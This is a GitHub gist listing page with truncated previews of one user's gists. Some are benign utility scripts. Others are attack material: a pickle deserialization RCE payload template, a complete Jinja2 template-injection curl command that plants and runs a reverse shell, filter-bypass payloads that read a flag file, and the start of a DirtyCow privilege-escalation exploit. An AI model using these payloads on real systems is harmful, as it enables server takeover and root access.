zema1
/ async_pool_run_with_stats.py
Created
December 29, 2019 11:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import asyncio | |
| import functools | |
| import random | |
| from multiprocessing import Manager | |
| from aiomultiprocess import Pool | |
| from aiomultiprocess.types import Queue | |
| async def work(q: Queue, sleep_time: int): |
zema1
/ enable_aptx_aac_macos.sh
Last active
September 1, 2020 14:47
— forked from marnovo/enable_aptx_aac_macos.sh
Enable AptX and AAC codecs on macOS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # (c) 2018 Marcelo Novaes | |
| # License - MIT | |
| # Enable AptX and AAC codecs on bluetooth connections on macOS | |
| sudo defaults write bluetoothaudiod "Enable AptX codec" -bool true | |
| sudo defaults write bluetoothaudiod "Enable AAC code" -bool true | |
| # default is 128, you can change to higher | |
| sudo defaults write bluetoothaudiod "AAC Bitrate" 128 |
zema1
/ pickle-payload.py
Created
August 1, 2018 10:07
— forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import os | |
| import sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ``` | |
| def base64_url_encode(text): | |
| return base64.b64encode(text).replace('+', '-').replace('/', '_').replace('=', '') | |
| def base64_url_decode(text): | |
| text = text.replace('-', '+').replace('_', '/') | |
| while True: | |
| try: | |
| result = base64.b64decode(text) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl 'localhost:8088/?next={{request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[6]],request.headers[request.headers.keys()[6]][5]).write(request.headers[request.headers.keys()[4]])}}{{config.from_pyfile(request.headers[request.headers.keys()[6]])}}' -g -H "x-f: /tmp/w" -H 'x-p: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("REVERSE_SHELL_IP",REVERSE_SHELL_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | |
| when filter __class__, __subclasses__ | |
| {% raw %}{{[].__getattribute__('__cla'+'ss__').__base__.__getattribute__([].__getattribute__('__cla'+'ss__').__base__,'__subclas'+'ses__')()[40]('/opt/flag_b420e8cfb8862548e68459ae1d37a1d5.txt','r').__getattribute__('r'+'ead')()}} {% endraw %} | |
| and more filter https://0day.work/jinja2-template-injection-filter-bypasses/ | |
| http://localhost:5000/?exploit={%set%20a,b,c,d,e,f,g,h,i%20=%20request|attr((request.args.usc*2,request.args. |
zema1
/ c0w.c
Created
April 9, 2018 05:31
— forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * A PTRACE_POKEDATA variant of CVE-2016-5195 | |
| * should work on RHEL 5 & 6 | |
| * | |
| * (un)comment correct payload (x86 or x64)! | |
| * $ gcc -pthread c0w.c -o c0w | |
| * $ ./c0w | |
| * DirtyCow root privilege escalation | |
| * Backing up /usr/bin/passwd.. to /tmp/bak | |
| * mmap fa65a000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # https://www.digitalocean.com/community/tutorials/how-to-build-go-executables-for-multiple-platforms-on-ubuntu-16-04 | |
| package=$1 | |
| if [[ -z "$package" ]]; then | |
| echo "usage: $0 <package-name>" | |
| exit 1 | |
| fi | |
| package_split=(${package//\// }) |
zema1
/ post-receive.sh
Created
November 21, 2016 07:43
— forked from icyleaf/post-receive.sh
git autodeploy script when it matches the string "[deploy]"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # | |
| # git autodeploy script when it matches the string "[deploy]" | |
| # | |
| # @author icyleaf <[email protected]> | |
| # @link http://icyleaf.com | |
| # @version 0.1 | |
| # | |
| # Usage: | |
| # 1. put this into the post-receive hook file itself below |